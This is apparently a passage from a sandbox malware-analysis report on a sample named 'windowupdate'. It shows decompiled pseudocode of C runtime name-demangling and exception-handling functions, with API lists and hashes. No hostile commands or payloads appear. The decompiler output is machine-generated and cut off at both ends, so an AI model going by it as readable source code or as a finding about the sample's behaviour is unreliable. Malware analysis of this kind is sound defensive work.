                      								_t153 = E00D55B00(_t185, _t205, _t243, _t244,  &_v280);
                      								_t245 = _t245 + 4;
                      								_v68 = _t153;
                      								E00D4F820( &_v16, E00D4FB70(_v68,  &_v288,  &_v16));
                      								L39:
                      								L41:
                      								continue;
                      							}
                      							_t24 = _v20 + 0xd57af8; // 0xcccccc04
                      							switch( *((intOrPtr*)(( *_t24 & 0x000000ff) * 4 +  &M00D57AE0))) {
                      								case 0:
                      									 *0xf20640 =  *0xf20640 - 1;
                      									 *0xf20640 =  *0xf20640 - 1;
                      									__ecx =  &_v200;
                      									_v48 = E00D5A1E0(__ebx, __edi, __esi,  &_v200, 1, 0);
                      									__edx =  &_v16;
                      									__eax =  &_v208;
                      									__ecx = _v48;
                      									__eax = E00D4FB70(_v48,  &_v208,  &_v16);
                      									__ecx =  &_v16;
                      									__eax = E00D4F820(__ecx, __eax);
                      									goto L39;
                      								case 1:
                      									__ecx =  &_v128;
                      									__eax = E00D4F080( &_v128, 0xf20640, 0x40);
                      									_v104 = E00D50060("`anonymous namespace\'", 0x15);
                      									_v100 = __edx;
                      									__ecx =  &_v16;
                      									__edx =  &_v104;
                      									 &_v216 = E00D4FAA0( &_v216,  &_v104,  &_v16);
                      									__ecx =  &_v16;
                      									__eax = E00D4F820( &_v16, __eax);
                      									__ecx =  *0xf20638; // 0x0
                      									__eax = E00D5A590(__ecx);
                      									__eflags = __eax;
                      									if(__eax == 0) {
                      										__ecx =  &_v128;
                      										__ecx =  *0xf20638; // 0x0
                      										__eax = E00D4FF70(__ecx,  &_v128);
                      									}
                      									goto L39;
                      								case 2:
                      									_t210 =  *0xf20640; // 0x0
                      									__eflags =  *((char*)(_t210 + (1 << 0))) - 0x5f;
                      									if(__eflags != 0) {
                      										L18:
                      										_t160 = E00D4FAD0( &_v176, 0x60, E00D544C0(_t185, _t243, _t244, __eflags,  &_v168));
                      										_t245 = _t245 + 0x10;
                      										_v40 = _t160;
                      										_v44 = E00D4FBB0(_v40,  &_v184, 0x27);
                      										E00D4F820( &_v16, E00D4FB70(_v44,  &_v192,  &_v16));
                      										L19:
                      										goto L39;
                      									}
                      									_t216 =  *0xf20640; // 0x0
                      									__eflags =  *((char*)(_t216 + (1 << 1))) - 0x3f;
                      									if(__eflags != 0) {
                      										goto L18;
                      									}
                      									_t167 =  *0xf20640; // 0x0
                      									 *0xf20640 = _t167 + 1;
                      									_t169 = E00D55E80(_t185, _t243, _t244,  &_v152, 0, 0);
                      									_t245 = _t245 + 0xc;
                      									_v36 = _t169;
                      									E00D4F820( &_v16, E00D4FB70(_v36,  &_v160,  &_v16));
                      									_t220 =  *0xf20640; // 0x0
                      									__eflags =  *_t220 - 0x40;
                      									if( *_t220 == 0x40) {
                      										_t173 =  *0xf20640; // 0x0
                      										_t174 = _t173 + 1;
                      										__eflags = _t174;
                      										 *0xf20640 = _t174;
                      									}
                      									goto L19;
                      								case 3:
                      									 *0xf20640 =  *0xf20640 + 1;
                      									 *0xf20640 =  *0xf20640 + 1;
                      									__eax =  &_v224;
                      									_v52 = E00D5A1E0(__ebx, __edi, __esi,  &_v224, 1, 0);
                      									__ecx =  &_v232;
                      									__ecx = _v52;
                      									_v56 = E00D4FBB0(_v52,  &_v232, 0x5d);
                      									__edx =  &_v16;
                      									__eax =  &_v240;
                      									__ecx = _v56;
                      									__eax = E00D4FB70(_v56,  &_v240,  &_v16);
                      									__ecx =  &_v16;
                      									__eax = E00D4F820(__ecx, __eax);
                      									_v5 = 1;
                      									goto L39;
                      								case 4:
                      									__ecx =  &_v28;
                      									__eax = E00D4F3F0( &_v28);
                      									__ecx =  *0xf20640; // 0x0
                      									__ecx = __ecx + 1;
                      									__eflags = __ecx;
                      									 *0xf20640 = __ecx;
                      									while(1) {
                      										__edx =  &_v88;
                      										__eax = E00D5A1E0(__ebx, __edi, __esi,  &_v88, 1, 0);
                      										__ecx =  &_v88;
                      										__eax = E00D5AB70( &_v88);
                      										__eflags = __eax;
                      										if(__eax != 0) {
                      											__ecx =  &_v28;
                      											__eax = E00D4F920( &_v28, 2);
                      										} else {
                      											__ecx =  &_v28;
                      											__eax = E00D5A560( &_v28);
                      											__eflags = __eax;
                      											if(__eax != 0) {
                      												__ecx =  &_v88;
                      												__ecx =  &_v28;
                      												__eax = E00D4F820( &_v28,  &_v88);
                      											} else {
                      												_v112 = E00D50060("::", 2);
                      												_v108 = __edx;
                      												__eax =  &_v112;
                      												__ecx =  &_v248;
                      												__ecx =  &_v88;
                      												_v60 = E00D4FB30( &_v88,  &_v248,  &_v112);
                      												__edx =  &_v28;
                      												__eax =  &_v256;
                      												__ecx = _v60;
                      												__eax = E00D4FB70(_v60,  &_v256,  &_v28);
                      												__ecx =  &_v28;
                      												__eax = E00D4F820( &_v28, __eax);
                      											}
                      										}
                      										__ecx =  &_v28;
                      										__eax = E00D5AB70( &_v28);
                      										__eflags = __eax;
                      										if(__eax != 0) {
                      											break;
                      										}
                      										__edx =  *0xf20640; // 0x0
                      										__eax =  *__edx;
                      										__eflags =  *__edx - 0x40;
                      										if( *__edx != 0x40) {
                      											continue;
                      										}
                      										break;
                      									}
                      									__ecx =  &_v28;
                      									__eax = E00D5AB70( &_v28);
                      									__eflags = __eax;
                      									if(__eax != 0) {
                      										__ecx =  &_v16;
                      										__eax = E00D4F920(__ecx, 2);
                      									} else {
                      										__ecx =  &_v28;
                      										__edx =  &_v264;
                      										_v64 = E00D4FAD0( &_v264, 0x5b,  &_v28);
                      										__eax =  &_v272;
                      										__ecx = _v64;
                      										__eax = E00D4FBB0(_v64,  &_v272, 0x5d);
                      										__ecx =  &_v16;
                      										__eax = E00D4F820( &_v16, __eax);
                      										__ecx =  *0xf20640; // 0x0
                      										__ecx = __ecx + 1;
                      										 *0xf20640 = __ecx;
                      									}
                      									goto L39;
                      								case 5:
                      									goto L38;
                      							}
                      						}
                      					}
                      					_t229 =  *0xf2064d & 0x000000ff;
                      					if(_t229 != 0) {
                      						goto L7;
                      					}
                      					E00D4F240(_a4,  &_v16);
                      					return _a4;
                      				}
                      				_t226 =  *0xf20640; // 0x0
                      				_v32 =  *_t226;
                      				if(_v32 == 0) {
                      					_t131 = E00D5A560( &_v16);
                      					if(_t131 == 0) {
                      						_v120 = E00D50060("::", 2);
                      						_v116 = _t226;
                      						_v76 = E00D4F350( &_v312, 1);
                      						_v80 = E00D4FB30(_v76,  &_v320,  &_v120);
                      						E00D4F820( &_v16, E00D4FB70(_v80,  &_v328,  &_v16));
                      					} else {
                      						E00D4F920( &_v16, 1);
                      					}
                      				} else {
                      					if(_v32 != 0x40) {
                      						E00D4F920( &_v16, 2);
                      					}
                      				}
                      				E00D4F240(_a4,  &_v16);
                      				return _a4;
                      			}


                      APIs
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D575AC
                      • Mailbox.LIBCMTD ref: 00D57604
                      • DName::isEmpty.LIBCMTD ref: 00D57614
                      • operator+.LIBVCRUNTIMED ref: 00D57641
                      • Mailbox.LIBCMTD ref: 00D5764D
                      • operator+.LIBVCRUNTIMED ref: 00D57667
                      • Mailbox.LIBCMTD ref: 00D57673
                      • DName::operator+.LIBCMTD ref: 00D57729
                      • Mailbox.LIBCMTD ref: 00D57732
                      • UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 00D5775B
                        • Part of subcall function 00D544C0: UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 00D544EB
                        • Part of subcall function 00D544C0: Mailbox.LIBCMTD ref: 00D54536
                      • operator+.LIBVCRUNTIMED ref: 00D5776D
                        • Part of subcall function 00D4FAD0: DName::operator+.LIBCMTD ref: 00D4FAF1
                      • DName::operator+.LIBCMTD ref: 00D57784
                        • Part of subcall function 00D4FBB0: Mailbox.LIBCMTD ref: 00D4FBC0
                        • Part of subcall function 00D4FBB0: DName::operator+=.LIBCMTD ref: 00D4FBCD
                        • Part of subcall function 00D4FBB0: Mailbox.LIBCMTD ref: 00D4FBD9
                      • Mailbox.LIBCMTD ref: 00D577A3
                      • DName::operator+.LIBCMTD ref: 00D577DE
                      • Mailbox.LIBCMTD ref: 00D577E7
                      • DName::operator+.LIBCMTD ref: 00D57A23
                      • Mailbox.LIBCMTD ref: 00D57A2C
                      • DName::operator+.LIBCMTD ref: 00D5779A
                        • Part of subcall function 00D4FB70: Mailbox.LIBCMTD ref: 00D4FB80
                        • Part of subcall function 00D4FB70: Mailbox.LIBCMTD ref: 00D4FB98
                      • DName::isEmpty.LIBCMTD ref: 00D57A52
                      • DName::operator=.LIBVCRUNTIMED ref: 00D57A60
                      • DName::DName.LIBVCRUNTIMED ref: 00D57A84
                      • DName::operator+.LIBCMTD ref: 00D57A9A
                      • DName::operator+.LIBCMTD ref: 00D57AB0
                      • Mailbox.LIBCMTD ref: 00D57AB9
                      • DName::operator=.LIBVCRUNTIMED ref: 00D57AC7
                      • Mailbox.LIBCMTD ref: 00D57AD3
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Mailbox$Name::operator+$Nameoperator+$DecoratedDecorator::getEmptyName::isName::operator=$Iterator_baseIterator_base::_Name::Name::operator+=std::_
                      • String ID: -$@$`anonymous namespace'
                      • API String ID: 625857421-2591561782
                      • Opcode ID: 1a5ed7bbddc1068a35e56a762e6ba6eeaae893dccb03609fdce6b9659bad7b72
                      • Instruction ID: 54c92d864bc92459585c343ba72e9a5e973602aeda3c759434c8f0cce97d6746
                      • Opcode Fuzzy Hash: 1a5ed7bbddc1068a35e56a762e6ba6eeaae893dccb03609fdce6b9659bad7b72
                      • Instruction Fuzzy Hash: 35F184B2D04118ABDF14DFA4EC92FEE7775EF44301F148169E91A66192EB306A49CFB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D55490(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                      				signed int _v8;
                      				char _v16;
                      				signed int _v20;
                      				signed int _v24;
                      				signed int _v28;
                      				signed int _v32;
                      				signed int _v36;
                      				intOrPtr _v40;
                      				intOrPtr _v44;
                      				intOrPtr _v48;
                      				intOrPtr _v52;
                      				intOrPtr _v56;
                      				char _v64;
                      				signed int _v68;
                      				char _v72;
                      				char _v80;
                      				char _v88;
                      				char _v96;
                      				char _v104;
                      				char _v112;
                      				char _v120;
                      				char _v128;
                      				char _v136;
                      				char _v144;
                      				char _v152;
                      				char _v160;
                      				char _v168;
                      				char _v176;
                      				char _v184;
                      				char _v192;
                      				char _v200;
                      				char _v208;
                      				char _v216;
                      				char _v224;
                      				char _v232;
                      				char _v240;
                      				char _v248;
                      				char _v256;
                      				char _v264;
                      				char _v272;
                      				signed int _t115;
                      				signed int _t117;
                      				signed int _t121;
                      				void* _t122;
                      				signed int _t124;
                      				void* _t131;
                      				signed int _t133;
                      				signed int _t134;
                      				signed int _t140;
                      				intOrPtr _t158;
                      				intOrPtr _t161;
                      				signed int _t165;
                      				void* _t166;
                      				intOrPtr _t170;
                      				void* _t172;
                      				signed int _t174;
                      				signed int _t180;
                      				void* _t183;
                      				void* _t186;
                      				void* _t190;
                      				void* _t194;
                      				intOrPtr _t197;
                      				signed int _t207;
                      				signed int _t211;
                      				void* _t215;
                      				signed int _t217;
                      				signed int _t218;
                      				signed int _t251;
                      				signed int _t252;
                      				signed int _t254;
                      				signed int _t265;
                      				signed int _t270;
                      				signed int _t274;
                      				signed int _t286;
                      				signed int _t290;
                      				signed int _t293;
                      				void* _t298;
                      				void* _t299;
                      				void* _t300;
                      				void* _t301;
                      				void* _t313;
                      
                      				_t299 = __esi;
                      				_t298 = __edi;
                      				_t215 = __ebx;
                      				_t115 =  *0xf20640; // 0x0
                      				_t317 =  *_t115;
                      				if( *_t115 != 0) {
                      					_t217 =  *0xf20640; // 0x0
                      					__eflags =  *_t217 - 0x36;
                      					if( *_t217 < 0x36) {
                      						L4:
                      						_t270 =  *0xf20640; // 0x0
                      						__eflags =  *_t270 - 0x5f;
                      						if( *_t270 == 0x5f) {
                      							L6:
                      							_t218 =  *0xf20640; // 0x0
                      							_v32 =  *_t218 - 0x36;
                      							_t117 =  *0xf20640; // 0x0
                      							 *0xf20640 = _t117 + 1;
                      							_v8 = _v32;
                      							__eflags = _v8 - 0x29;
                      							if(_v8 != 0x29) {
                      								__eflags = _v8;
                      								if(_v8 < 0) {
                      									L16:
                      									_v8 = 0xffffffff;
                      									L17:
                      									__eflags = _v8 - 0xffffffff;
                      									if(_v8 != 0xffffffff) {
                      										E00D4F3F0( &_v64);
                      										_t222 =  &_v16;
                      										E00D4F240( &_v16, _a8);
                      										_t274 = _v8 & 0x00000002;
                      										__eflags = _t274;
                      										if(_t274 == 0) {
                      											L35:
                      											_t276 = _v8 & 0x00000004;
                      											__eflags = _v8 & 0x00000004;
                      											if((_v8 & 0x00000004) != 0) {
                      												_t165 = E00D52230(_t222);
                      												__eflags = _t165;
                      												if(_t165 == 0) {
                      													_t166 = E00D52BE0(_t215,  &_v168, _t276, _t298, _t299,  &_v168);
                      													_t300 = _t300 + 4;
                      													_t222 =  &_v16;
                      													E00D50000( &_v16, __eflags, _t166);
                      												} else {
                      													_t170 = E00D4FAD0( &_v152, 0x20, E00D52BE0(_t215, _t222, _t276, _t298, _t299,  &_v144));
                      													_t300 = _t300 + 0x10;
                      													_v44 = _t170;
                      													_t172 = E00D4FB70(_v44,  &_v160,  &_v16);
                      													_t222 =  &_v16;
                      													E00D4F820( &_v16, _t172);
                      												}
                      											}
                      											_t121 = E00D52230(_t222);
                      											__eflags = _t121;
                      											if(_t121 == 0) {
                      												_t122 = E00D537C0( &_v192);
                      												_t301 = _t300 + 4;
                      												E00D50000( &_v16, __eflags, _t122);
                      											} else {
                      												_t161 = E00D537C0( &_v176);
                      												_t301 = _t300 + 4;
                      												_v48 = _t161;
                      												E00D4F820( &_v16, E00D4FB70(_v48,  &_v184,  &_v16));
                      											}
                      											_t124 = E00D5A560(_a8);
                      											__eflags = _t124;
                      											if(_t124 == 0) {
                      												_t158 = E00D4FAD0( &_v200, 0x28,  &_v16);
                      												_t301 = _t301 + 0xc;
                      												_v52 = _t158;
                      												E00D4F820( &_v16, E00D4FBB0(_v52,  &_v208, 0x29));
                      											}
                      											_v24 = E00D4F7A0(8, 0xf2065c, 0);
                      											__eflags = _v24;
                      											if(_v24 == 0) {
                      												_v28 = 0;
                      											} else {
                      												_v28 = E00D4F3F0(_v24);
                      											}
                      											_v20 = _v28;
                      											E00D57550(_t215, _t298, _t299,  &_v80, _v20);
                      											_v56 = E00D4FAD0( &_v224, 0x28, E00D525F0(_t215, _t298, _t299,  &_v216));
                      											_t131 = E00D4FBB0(_v56,  &_v232, 0x29);
                      											_t228 =  &_v16;
                      											E00D4FD40( &_v16, _t131);
                      											_t133 = E00D52380( &_v16);
                      											__eflags = _t133;
                      											if(_t133 != 0) {
                      												__eflags = _v8 & 0x00000002;
                      												if((_v8 & 0x00000002) != 0) {
                      													_t228 =  &_v16;
                      													E00D4FD40( &_v16,  &_v64);
                      												}
                      											}
                      											_t134 = E00D52350(_t228);
                      											__eflags = _t134;
                      											if(_t134 == 0) {
                      												E00D50000( &_v16, __eflags, E00D57390( &_v248));
                      											} else {
                      												E00D4FD40( &_v16, E00D57390( &_v240));
                      											}
                      											E00D4FD40( &_v16, E00D55D00( &_v256));
                      											_t140 = E00D523B0( &_v16);
                      											__eflags = _t140;
                      											if(_t140 == 0) {
                      												E00D50000( &_v16, __eflags, E00D58EE0( &_v272));
                      											} else {
                      												E00D4FD40( &_v16, E00D58EE0( &_v264));
                      											}
                      											__eflags = _v20;
                      											if(_v20 == 0) {
                      												E00D4F350(_a4, 3);
                      												return _a4;
                      											} else {
                      												E00D4F820(_v20,  &_v16);
                      												E00D4F240(_a4,  &_v80);
                      												return _a4;
                      											}
                      										}
                      										_t174 =  *0xf20640; // 0x0
                      										__eflags =  *_t174 - 0x40;
                      										if( *_t174 == 0x40) {
                      											_t251 =  *0xf20640; // 0x0
                      											_t252 = _t251 + 1;
                      											__eflags = _t252;
                      											 *0xf20640 = _t252;
                      										} else {
                      											_v72 = E00D50060("::", 2);
                      											_v68 = _t274;
                      											_t190 = E00D4FAA0( &_v88,  &_v72,  &_v16);
                      											_t313 = _t300 + 0x14;
                      											E00D4F820( &_v16, _t190);
                      											_t290 =  *0xf20640; // 0x0
                      											__eflags =  *_t290;
                      											if(__eflags == 0) {
                      												_t194 = E00D4FB00(__eflags,  &_v120, 1,  &_v16);
                      												_t300 = _t313 + 0xc;
                      												E00D4F820( &_v16, _t194);
                      											} else {
                      												_t197 = E00D4FAD0( &_v104, 0x20, E00D575A0(_t215, _t298, _t299, __eflags,  &_v96));
                      												_t300 = _t313 + 0x10;
                      												_v40 = _t197;
                      												E00D4F820( &_v16, E00D4FB70(_v40,  &_v112,  &_v16));
                      											}
                      										}
                      										_t286 =  *0xf20640; // 0x0
                      										__eflags =  *_t286;
                      										if(__eflags == 0) {
                      											E00D4FB00(__eflags, _a4, 1,  &_v16);
                      											return _a4;
                      										} else {
                      											_t254 =  *0xf20640; // 0x0
                      											__eflags =  *_t254 - 0x40;
                      											if( *_t254 != 0x40) {
                      												E00D4F350(_a4, 2);
                      												return _a4;
                      											}
                      											_t180 =  *0xf20640; // 0x0
                      											 *0xf20640 = _t180 + 1;
                      											__eflags = E00D52380(_t254);
                      											if(__eflags == 0) {
                      												_t183 = E00D58EA0(_t215, _t298, _t299,  &_v136);
                      												_t300 = _t300 + 4;
                      												_t222 =  &_v64;
                      												E00D50000( &_v64, __eflags, _t183);
                      											} else {
                      												_t186 = E00D58EA0(_t215, _t298, _t299,  &_v128);
                      												_t300 = _t300 + 4;
                      												_t222 =  &_v64;
                      												E00D4F820( &_v64, _t186);
                      											}
                      											goto L35;
                      										}
                      									}
                      									E00D4F350(_a4, 2);
                      									return _a4;
                      								}
                      								__eflags = _v8 - 3;
                      								if(_v8 <= 3) {
                      									goto L17;
                      								}
                      								goto L16;
                      							}
                      							_t293 =  *0xf20640; // 0x0
                      							__eflags =  *_t293;
                      							if(__eflags == 0) {
                      								E00D4FB00(__eflags, _a4, 1, _a8);
                      								return _a4;
                      							}
                      							_t265 =  *0xf20640; // 0x0
                      							_v36 =  *_t265 - 0x3d;
                      							_t207 =  *0xf20640; // 0x0
                      							 *0xf20640 = _t207 + 1;
                      							_v8 = _v36;
                      							__eflags = _v8 - 4;
                      							if(_v8 < 4) {
                      								L10:
                      								_v8 = 0xffffffff;
                      								L11:
                      								goto L17;
                      							}
                      							__eflags = _v8 - 7;
                      							if(_v8 <= 7) {
                      								goto L11;
                      							}
                      							goto L10;
                      						}
                      						E00D4F350(_a4, 2);
                      						return _a4;
                      					}
                      					_t211 =  *0xf20640; // 0x0
                      					__eflags =  *_t211 - 0x39;
                      					if( *_t211 <= 0x39) {
                      						goto L6;
                      					}
                      					goto L4;
                      				}
                      				E00D4FB00(_t317, _a4, 1, _a8);
                      				return _a4;
                      			}

                      APIs
                      • operator+.LIBVCRUNTIMED ref: 00D554AF
                        • Part of subcall function 00D4FB00: DName::DName.LIBVCRUNTIMED ref: 00D4FB0D
                        • Part of subcall function 00D4FB00: DName::operator+.LIBCMTD ref: 00D4FB20
                      • DName::DName.LIBVCRUNTIMED ref: 00D554ED
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: NameName::$Name::operator+operator+
                      • String ID: )
                      • API String ID: 308612335-2427484129
                      • Opcode ID: 3e33a533fc7f8bc346594c4834222edfcfaf0a1e195a5bf6ad9a99577fb197dc
                      • Instruction ID: 2f91a00fa117dbcd0160bbd65d33b0aad455f879566905a2e917288caa7474ee
                      • Opcode Fuzzy Hash: 3e33a533fc7f8bc346594c4834222edfcfaf0a1e195a5bf6ad9a99577fb197dc
                      • Instruction Fuzzy Hash: D4E152B2D00508ABDF15DFA0ECA2AEE7775EF44305F148169FD166A156EB30AB08CB71
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 95%
                      			E00D4CD60(void* __ebx, void* __edi, void* __esi, signed int _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, signed int _a20, signed int _a24, intOrPtr _a28, intOrPtr _a32) {
                      				signed int _v5;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr* _v20;
                      				intOrPtr _v24;
                      				char* _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				char _v40;
                      				char _v48;
                      				char _v56;
                      				char _v64;
                      				char _v72;
                      				char _v80;
                      				intOrPtr _v84;
                      				char _v88;
                      				intOrPtr _v104;
                      				char _v108;
                      				char _v124;
                      				char _v136;
                      				void* __ebp;
                      				intOrPtr _t170;
                      				void* _t175;
                      				void* _t184;
                      				void* _t189;
                      				void* _t192;
                      				void* _t203;
                      				signed char _t209;
                      				signed char _t213;
                      				void* _t214;
                      				void* _t236;
                      				void* _t245;
                      				signed char _t254;
                      				signed char _t255;
                      				void* _t265;
                      				void* _t266;
                      				void* _t352;
                      				void* _t353;
                      				void* _t354;
                      				void* _t355;
                      				void* _t357;
                      				void* _t358;
                      
                      				_t353 = __esi;
                      				_t352 = __edi;
                      				_t266 = __ebx;
                      				_v5 = 0;
                      				_v12 = 0xffffffff;
                      				_t267 = _a16;
                      				_t170 = E00D5B4A0(_a8, _a16, _a20);
                      				_t355 = _t354 + 0xc;
                      				_v12 = _t170;
                      				if(_v12 < 0xffffffff) {
                      					L3:
                      					L00D90DE0(_t266, _t267, _t352, _t353);
                      					L4:
                      					if( *_a4 != 0xe06d7363 ||  *((intOrPtr*)(_a4 + 0x10)) != 3 ||  *((intOrPtr*)(_a4 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_a4 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_a4 + 0x14)) != 0x19930522) {
                      						L27:
                      						E00D4D6F0( &_v56, _a20, 0);
                      						if( *_a4 != 0xe06d7363 ||  *((intOrPtr*)(_a4 + 0x10)) != 3 ||  *((intOrPtr*)(_a4 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_a4 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_a4 + 0x14)) != 0x19930522) {
                      							_t270 =  &_v56;
                      							if(E00D4E140( &_v56) > 0) {
                      								if((_a24 & 0x000000ff) != 0) {
                      									L00D90DE0(_t266,  &_v56, _t352, _t353);
                      								}
                      								_t270 = _a4;
                      								E00D4D280(_t266, _a4, _t352, _a4, _a8, _a12, _a16, _a20, _v12, _a28, _a32);
                      							}
                      							goto L74;
                      						} else {
                      							_t270 =  &_v56;
                      							if(E00D4E140( &_v56) <= 0) {
                      								_t184 = E00D4E130(_a20);
                      								_t357 = _t355 + 4;
                      								if(_t184 < 0x19930521) {
                      									L55:
                      									L00D90DE0(_t266, _t270, _t352, _t353);
                      									L56:
                      									if((_a24 & 0x000000ff) != 0) {
                      										_push(1);
                      										_t270 = _a4;
                      										E00D4B0E0(_a4);
                      										_t357 = _t357 + 8;
                      									}
                      									if(( *_a20 & 0x1fffffff) < 0x19930521) {
                      										L69:
                      										L74:
                      										_t175 = E00D4C670(_t266, _t270, _t352, _t353);
                      										if( *((intOrPtr*)(_t175 + 0x1c)) != 0) {
                      											return L00D90DE0(_t266, _t270, _t352, _t353);
                      										}
                      										return _t175;
                      									} else {
                      										_t270 = _a20;
                      										_t189 = E00D4E100(_a20);
                      										_t358 = _t357 + 4;
                      										if(_t189 != 0) {
                      											L62:
                      											_t273 = _a20;
                      											if((E00D4E190(_a20, _a20) & 0x000000ff) != 0) {
                      												 *((intOrPtr*)(E00D4C670(_t266, _t273, _t352, _t353) + 0x10)) = _a4;
                      												 *((intOrPtr*)(E00D4C670(_t266, _a4, _t352, _t353) + 0x14)) = _a12;
                      												E00D89BF0(_a4);
                      											}
                      											_t192 = E00D4E100(_a20);
                      											_t270 = _a4;
                      											if((E00D4DF20(_t266, _t352, _t353, _a4, _t192) & 0x000000ff) == 0) {
                      												 *((intOrPtr*)(E00D4C670(_t266, _t270, _t352, _t353) + 0x10)) = _a4;
                      												 *((intOrPtr*)(E00D4C670(_t266, _a4, _t352, _t353) + 0x14)) = _a12;
                      												if(_a32 != 0) {
                      													E00D49970(_a32, _a4);
                      												} else {
                      													E00D49970(_a8, _a4);
                      												}
                      												E00D4DD70(_a8, _a16, _a20);
                      												E00D4DC70(_t266, _a20, _t352, _t353, E00D4E100(_a20));
                      												 *((intOrPtr*)(E00D4C670(_t266, _a20, _t352, _t353) + 0x10)) = _a4;
                      												_t203 = E00D4C670(_t266, _a20, _t352, _t353);
                      												_t270 = _a12;
                      												 *((intOrPtr*)(_t203 + 0x14)) = _a12;
                      											}
                      											goto L69;
                      										}
                      										_t209 = E00D4E190(_t270, _a20);
                      										_t358 = _t358 + 4;
                      										if((_t209 & 0x000000ff) == 0 || _a28 != 0) {
                      											goto L69;
                      										} else {
                      											goto L62;
                      										}
                      									}
                      								}
                      								_t213 = E00D4E190( &_v56, _a20);
                      								_t357 = _t357 + 4;
                      								_t270 = _t213 & 0x000000ff;
                      								if((_t213 & 0x000000ff) != 0) {
                      									L54:
                      									goto L56;
                      								}
                      								_t214 = E00D4E100(_a20);
                      								_t357 = _t357 + 4;
                      								if(_t214 == 0) {
                      									goto L55;
                      								}
                      								goto L54;
                      							}
                      							E00D496D0(_t266, _t352, _t353,  &_v88,  &_v56, _v12, _a16, _a20, _a28);
                      							_t357 = _t355 + 0x18;
                      							_v40 = _v88;
                      							_v36 = _v84;
                      							while(1) {
                      								_t270 =  &_v40;
                      								if((E00D4D950( &_v40,  &_v80) & 0x000000ff) == 0) {
                      									break;
                      								}
                      								E00D4D8C0( &_v40,  &_v108);
                      								if(_v108 > _v12 || _v12 > _v104) {
                      									goto L34;
                      								} else {
                      									_push(0);
                      									_push(0);
                      									E00D4D6C0( &_v64,  &_v108);
                      									_v28 =  &_v64;
                      									E00D4E0B0(_v28,  &_v48);
                      									E00D4E0D0(_v28,  &_v72);
                      									while((E00D4D840( &_v48,  &_v72) & 0x000000ff) != 0) {
                      										E00D4D880( &_v48,  &_v124);
                      										_v20 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x1c)) + 0xc)) + 4;
                      										_v16 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x1c)) + 0xc))));
                      										while(_v16 > 0) {
                      											_v32 =  *_v20;
                      											_t236 = E00D4E030( &_v124, _v32,  *((intOrPtr*)(_a4 + 0x1c)));
                      											_t357 = _t357 + 0xc;
                      											if(_t236 != 0) {
                      												_push(_a24 & 0x000000ff);
                      												_push(_v5 & 0x000000ff);
                      												E00D4CC90(_a4, _a8, _a12, _a16, _a20,  &_v124, _v32,  &_v108, _a28, _a32);
                      												_t357 = _t357 + 0x30;
                      												goto L49;
                      											}
                      											_v16 = _v16 - 1;
                      											_v20 = _v20 + 4;
                      										}
                      										E00D4D910( &_v48);
                      									}
                      									L49:
                      									L34:
                      									E00D4D930( &_v40);
                      									continue;
                      								}
                      							}
                      							goto L56;
                      						}
                      					} else {
                      						_t307 = _a4;
                      						if( *((intOrPtr*)(_a4 + 0x1c)) != 0) {
                      							goto L27;
                      						}
                      						_t245 = E00D4C670(_t266, _t307, _t352, _t353);
                      						if( *((intOrPtr*)(_t245 + 0x10)) == 0) {
                      							return _t245;
                      						}
                      						_a4 =  *((intOrPtr*)(E00D4C670(_t266, _t307, _t352, _t353) + 0x10));
                      						_a12 =  *(E00D4C670(_t266, _t307, _t352, _t353) + 0x14);
                      						_v5 = 1;
                      						if(_a4 == 0) {
                      							L20:
                      							L00D90DE0(_t266, _t307, _t352, _t353);
                      							L21:
                      							if( *((intOrPtr*)(E00D4C670(_t266, _t307, _t352, _t353) + 0x1c)) != 0) {
